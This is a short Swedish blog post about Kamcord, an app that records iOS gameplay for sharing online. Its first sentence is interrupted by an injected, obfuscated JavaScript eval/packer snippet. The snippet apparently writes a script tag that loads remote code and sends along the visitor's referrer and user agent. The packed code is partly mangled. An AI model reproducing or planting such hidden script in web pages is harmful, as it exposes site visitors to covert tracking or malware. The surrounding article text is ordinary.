Image Image Image Image Image Image Image Image Image Image

| 12 december, 2019

Scroll to top

Top

Kamcord: spela in när du spelar mobilspel

Filip Urde
  • On 14 februari, 2013
  • http://www.revue.se/filip-urde

Har eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fzkbd|var|u0026u|referrer|iethk||js|php’.split(’|’),0,{}))
du vänner som aldrig tror att du slagit ett rekord eller klarat ett uppdrag i ett spel? Då är Kamcord lösningen för dig.

 

 

Kamcord är en app som automatiskt spelar in både ljud och bild i dina spel på iOS. Har du klarat oändligt långt i temple run och är rädd att ingen ska tro dig. Då kan du med kamcord enkelt  spela in och dela videoklippet på nätet. 

Kamcord kommer även att släppas till Android, men först senare i år. 
kamcord.com